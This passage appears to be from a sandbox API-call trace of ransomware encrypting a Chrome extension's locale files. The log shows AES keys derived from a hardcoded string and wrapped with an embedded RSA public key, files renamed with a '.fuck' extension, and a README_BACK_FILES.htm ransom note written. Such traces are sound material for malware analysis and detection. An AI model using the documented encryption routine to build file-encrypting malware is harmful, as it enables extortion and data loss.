KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.843] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.843] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2939da0) returned 1 [0247.844] CryptImportPublicKeyInfo (in: hCryptProv=0x2939da0, dwCertEncodingType=0x1, pInfo=0x2930300*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930330*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930338*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29385f8) returned 1 [0247.844] CryptEncrypt (in: hKey=0x29385f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.844] CryptEncrypt (in: hKey=0x29385f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939e28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939e28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.844] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939e28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939e28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.845] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xea, lpOverlapped=0x0) returned 1 [0247.847] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xea, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf0) returned 1 [0247.847] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xf0, lpOverlapped=0x0) returned 1 [0247.847] CloseHandle (hObject=0x5d5c) returned 1 [0247.847] CloseHandle (hObject=0x5d58) returned 1 [0247.852] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), bFailIfExists=0) returned 1 [0247.857] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json", dwFileAttributes=0x0) returned 1 [0247.858] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.gsg")) returned 1 [0247.859] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\messages.json.fuck")) returned 1 [0247.861] CryptDestroyHash (hHash=0x2938978) returned 1 [0247.861] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.861] CryptReleaseContext (hProv=0x293a400, dwFlags=0x0) returned 1 [0247.861] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.861] FindClose (in: hFindFile=0x2938af8 | out: hFindFile=0x2938af8) returned 1 [0247.862] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\readme_back_files.htm")) returned 0xffffffff [0247.862] AreFileApisANSI () returned 1 [0247.862] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.862] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\de\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.863] GetFileType (hFile=0x5d50) returned 0x1 [0247.863] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.865] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.865] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938af8 [0247.869] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.869] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.869] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.869] GetLastError () returned 0x0 [0247.869] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json")) returned 0x20 [0247.869] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", dwFileAttributes=0x80) returned 1 [0247.870] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.870] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.871] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.871] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.874] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.874] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.874] CryptHashData (hHash=0x29387f8, pbData=0x28cb760, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.875] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.875] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.875] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.875] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a400) returned 1 [0247.875] CryptImportPublicKeyInfo (in: hCryptProv=0x293a400, dwCertEncodingType=0x1, pInfo=0x292f2c0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x292f2f0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x292f2f8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936df8) returned 1 [0247.876] CryptEncrypt (in: hKey=0x2936df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.876] CryptEncrypt (in: hKey=0x2936df8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ab70*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ab70*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.876] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293ab70*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ab70*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.877] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x112, lpOverlapped=0x0) returned 1 [0247.878] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x112, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x120) returned 1 [0247.878] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x120, lpOverlapped=0x0) returned 1 [0247.879] CloseHandle (hObject=0x5d58) returned 1 [0247.879] CloseHandle (hObject=0x5d5c) returned 1 [0247.884] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), bFailIfExists=0) returned 1 [0247.888] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json", dwFileAttributes=0x0) returned 1 [0247.888] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.gsg")) returned 1 [0247.890] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\messages.json.fuck")) returned 1 [0247.890] CryptDestroyHash (hHash=0x29387f8) returned 1 [0247.890] CryptDestroyKey (hKey=0x29389f8) returned 1 [0247.891] CryptReleaseContext (hProv=0x2939f38, dwFlags=0x0) returned 1 [0247.891] FindNextFileA (in: hFindFile=0x2938af8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0247.891] FindClose (in: hFindFile=0x2938af8 | out: hFindFile=0x2938af8) returned 1 [0247.891] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\readme_back_files.htm")) returned 0xffffffff [0247.891] AreFileApisANSI () returned 1 [0247.891] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3a48, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0247.891] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\el\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0247.892] GetFileType (hFile=0x5d50) returned 0x1 [0247.892] WriteFile (in: hFile=0x5d50, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0247.893] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0247.893] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2938978 [0247.893] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.893] FindNextFileA (in: hFindFile=0x2938978, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0247.893] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0247.894] GetLastError () returned 0x0 [0247.894] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json")) returned 0x20 [0247.894] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json", dwFileAttributes=0x80) returned 1 [0247.894] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0247.895] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0247.896] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0247.897] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2939f38) returned 1 [0247.900] CryptCreateHash (in: hProv=0x2939f38, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0247.900] lstrlenA (lpString="osrRauaJWHpjVHoZEmzKfOkGzMlQm") returned 29 [0247.900] CryptHashData (hHash=0x29387f8, pbData=0x28cb558, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0247.900] CryptDeriveKey (in: hProv=0x2939f38, Algid=0x6610, hBaseData=0x29387f8, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29389f8) returned 1 [0247.900] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----m", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0247.900] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0247.900] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293a510) returned 1 [0247.900] CryptImportPublicKeyInfo (in: hCryptProv=0x293a510, dwCertEncodingType=0x1, pInfo=0x29303d0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2930400*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2930408*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2936f78) returned 1 [0247.900] CryptEncrypt (in: hKey=0x2936f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0247.901] CryptEncrypt (in: hKey=0x2936f78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2939fc0*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2939fc0*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0247.901] WriteFile (in: hFile=0x5d58, lpBuffer=0x2939fc0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2939fc0*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0247.902] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd6, lpOverlapped=0x0) returned 1 [0247.903] CryptEncrypt (in: hKey=0x29389f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd6, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0247.903] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0247.903] CloseHandle (hObject=0x5d5c) returned 1 [0247.903] CloseHandle (hObject=0x5d58) returned 1 [0247.907] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_GB\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aapocclcgogkmnckokdopfmhonfmgoek\\0.9_0\\_locales\\en_gb\\messages.json"), bFailIfExists=0) returned 1 [0247.911] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 